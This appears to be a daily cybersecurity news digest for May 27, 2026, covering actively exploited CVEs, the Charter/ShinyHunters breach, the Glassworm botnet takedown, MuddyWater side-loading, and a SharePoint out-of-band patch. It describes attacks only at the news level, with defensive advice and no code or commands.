The Lyceum: Cyber Intelligence Daily — May 27, 2026

Today's theme is the slow-motion collapse of the boundary between "tools you trust" and "tools that betray you." ShinyHunters didn't hack Charter — they called Charter, and walked away with 42 million customer records. CrowdStrike spent the night dismantling a botnet that was living inside developer extensions and npm packages. Microsoft shipped an out-of-band SharePoint patch, and CISA put two more actively exploited bugs on the clock. The connective tissue: every story today is about a trust relationship that turned out to be a one-way street.

• CVE-2026-48172 — LiteSpeed cPanel Plugin: actively exploited, added to CISA KEV with a May 29 federal deadline. Allows arbitrary script execution with root privileges on shared hosting servers.
• CVE-2026-9082 — Drupal Core: actively exploited SQL injection enabling privilege escalation and RCE. KEV federal deadline expires today (May 27).
• CVE-2026-45659 — Microsoft SharePoint Server (Subscription Edition, 2019, 2016): patched out-of-band, CVSS 8.8, authenticated RCE via untrusted deserialization. Site Member permissions are enough.
• CVE-2025-34291 — Langflow: actively exploited, KEV deadline June 4. CVSS 8.8, origin validation error in CORS configuration.
• CVE-2026-34926 — Trend Micro Apex One (on-prem): actively exploited directory traversal, KEV deadline June 4.
• Glassworm botnet — Cross-platform developer-targeting malware delivered via OpenVSX extensions, npm, and Python packages; all four C2 channels (Solana blockchain, BitTorrent DHT, Google Calendar, plus a fourth) severed by CrowdStrike, Google, and Shadowserver on May 26.
• Megalodon supply chain attack — More than 5,500 GitHub repositories compromised via malicious commits in a six-hour window using stolen developer credentials.

If you're a Spectrum customer, your name, email, home address, phone number, and account details may be sitting in a criminal group's hands right now.

Charter Communications has confirmed a data breach after ShinyHunters threatened to leak stolen data unless a ransom is paid. The attack vector is the part that should make every security team uncomfortable: the attackers didn't crack any sophisticated code. They made a phone call. According to Komando's reporting, ShinyHunters used voice phishing to compromise an employee's Microsoft Entra account, then exported records directly from Charter's Salesforce database. The listing claims over 42 million records containing names, emails, addresses, phone numbers, account plan details, and customer support ticket data, per CyberInsider.

Charter's official position is that "no sensitive personal information or customer proprietary network information (CPNI) data was exfiltrated." That's a narrow legal claim. It can be technically accurate while still meaning your basic account data is now leak-market inventory.

What changes if the ransom deadline passes without payment: the 42-million-record dump becomes raw material for targeted phishing, SIM-swapping, and account takeover campaigns against Spectrum customers for months. The signal to watch is whether ShinyHunters publishes a sample — that's their pattern when negotiations stall. The deeper structural problem: voice phishing an employee into handing over cloud credentials bypasses every technical control most enterprises have invested in. The MFA fatigue era is giving way to the "talk your way past the help desk" era, and Charter just became this week's case study.

If you write software for a living, this one is about you specifically.

On May 26, CrowdStrike's Counter Adversary Operations team — working with Google and the Shadowserver Foundation — severed all four command-and-control channels of the Glassworm botnet simultaneously. Glassworm's operators had published trojanized VSCode extensions to the OpenVSX marketplace disguised as time trackers and code formatters, targeting not only VSCode but Cursor, Positron, Windsurf, and VSCodium. Compromised npm and Python packages introduced malicious code through postinstall hooks. More than 300 GitHub repositories were poisoned using stolen developer credentials, with malicious code force-pushed into default branches.

The infrastructure was designed to survive takedowns. CrowdStrike documents Glassworm using Solana blockchain transactions as an immutable dead-drop, BitTorrent's distributed hash table for configuration, and Google Calendar event titles as encoded C2 paths. The malware checks locale, language, and timezone at runtime and quietly exits if it detects a CIS country — the standard tell for Russian-aligned criminal operations.

What changes if this takedown holds: it's the first major coordinated disruption of a developer-supply-chain botnet at this scale, and it sets a precedent for how this category of threat gets attacked. The signal to watch is whether the operators rebuild on a new infrastructure pattern or whether arrests follow. What failure looks like: the same operators surface in 60 days with a fresh extension marketplace campaign, and we learn that severing C2 without taking the humans behind it just buys defenders a quarter. Either way, if you installed any VSCode extension or npm/Python package from an unfamiliar source in the past year, audit your developer environment now. The channels are dead. The infections are not.

The most dangerous intrusions aren't the loud ones. They're the ones where the attacker sits quietly for a week, reading everything.

The Iranian hacking group MuddyWater hit at least nine organizations across nine countries in Q1 2026, according to Broadcom's Symantec and Carbon Black Threat Hunter Team. Targets spanned industrial and electronics manufacturing, education, the public sector, financial services, and professional services. Among the victims: a major South Korean electronics manufacturer where attackers maintained access for a week in February 2026. Also affected were an international airport in the Middle East, Southeast Asian industrial manufacturers, and a Latin American financial-services provider.

The technique is worth understanding. MuddyWater relied heavily on DLL side-loading using legitimately signed Fortemedia and SentinelOne binaries to execute malicious DLLs. In plain terms: they hid their malware inside files that look exactly like trusted security and audio software. Your endpoint detection tool sees a signed SentinelOne binary and waves it through. The Hacker News also notes a separate Iran-linked exfiltration campaign affecting the U.S., Israel, Saudi Arabia, and Turkey between late March and early April 2026, with at least two U.S. victims also targeted by destructive operations including deletion of partitions and backups — infrastructure tied by Gambit Security to Iran's Ministry of Intelligence and Security (MOIS).

What changes if this pattern holds: signature-based EDR becomes structurally less useful against MuddyWater, and behavioral detection across legitimately-signed binaries becomes table stakes. The signal that tells you which way it's going: the next MuddyWater disclosure either names the abused-binary set as the same Fortemedia/SentinelOne pair, or it names new ones — and the speed at which they rotate determines whether vendors can keep up with allowlist hygiene at all.

SharePoint sits at the center of your organization's document universe — contracts, HR files, project plans. When it has a remote code execution flaw, it's not a theoretical problem.

Microsoft issued an out-of-band patch for CVE-2026-45659, a SharePoint RCE vulnerability with a CVSS score of 8.8. According to Help Net Security, the bug stems from deserialization of untrusted data, allowing an authenticated attacker with as little as Site Member permissions to execute code remotely on a vulnerable server. "Authenticated" is a lower bar than it sounds: a contractor, a temp, or a phished employee account fits the profile. It affects SharePoint Server Subscription Edition, SharePoint Server 2019, and SharePoint Enterprise Server 2016.

Microsoft says exploitation is currently "less likely," and no public PoC exists yet.

What changes if a PoC drops: the window between disclosure and mass exploitation will be measured in hours, not days — SharePoint's history makes this near-certain eventually. Help Net Security notes deployments have been targeted by nation-state hackers, ransomware operators, and initial access brokers in the past. The signal that tells you which path this is on: watch for the first credible PoC on Exploit-DB or a security researcher's blog. The historical pattern is that "less likely to be exploited" SharePoint bugs become "actively exploited" SharePoint bugs roughly two to six weeks after disclosure. Patch now, especially if your SharePoint is internet-facing or accessible to external contractors.

Russian-language security outlet Xakep published technical detail overnight on two zero-day vulnerabilities in Microsoft products, internally named UnDefend and RedSun, fixed in the May 2026 update cycle. The names have not yet surfaced in English-language security coverage. Both appear in the broader set of Nightmare-Eclipse exploits confirmed in real-world attacks tied to Russian-geolocated infrastructure, which makes the Xakep writeup notable: it's the most detailed public mapping of the exploit names to CVE assignments currently available. Western outlets will likely pick this up in the next 24-48 hours; until then, anyone hunting for these in their environment needs a translation tab open. Source: Xakep.ru — Russian. No English-language coverage confirmed at time of publication.

Xakep reports that a threat actor is advertising a database of 340 million OnlyFans user records on underground forums. The scale is implausible on its face — that's roughly twice OnlyFans' publicly stated user count — and the company has not confirmed any breach. But the listing is active, and if even a fraction of the claimed data is real, it represents a significant privacy exposure for a platform whose users have strong reasons to keep their membership private. Treat the volume claim with skepticism; treat the existence of something being shopped as worth tracking. Source: Xakep.ru — Russian. No English-language coverage confirmed at time of publication.

CERT-UA's "Danger Bulletin" CERT-UA#19542 documents that the cluster Ukraine tracks as UAC-0001 — known in the West as APT28 or Fancy Bear — is actively weaponizing CVE-2026-21509 against Ukrainian and EU targets. The advisory predates English-language reporting on this exact CVE-to-actor mapping by a meaningful margin, which is the recurring pattern with CERT-UA: Ukrainian defenders are operating with better real-time signal on GRU-linked operations than most NATO-aligned SOCs. If you have EU government, defense, or critical-infrastructure exposure, pull the IOCs from the advisory now, not after the Western echo arrives. Source: CERT-UA — Ukrainian. No English-language coverage confirmed at time of publication.

Today gave us a telecom giant undone by a phone call, a botnet using Google Calendar as a dead drop, and a disgruntled researcher counting down to Bastille Day in blog posts. Somewhere, a SharePoint admin is reading the patch notes and wondering whether "currently less likely to be exploited" is Microsoft's love language or its threat assessment.

Stay paranoid out there.

If this landed in your inbox and someone you know runs a SharePoint server, a Spectrum account, or a VSCode extension they downloaded last Tuesday — forward it. They'll thank you Friday.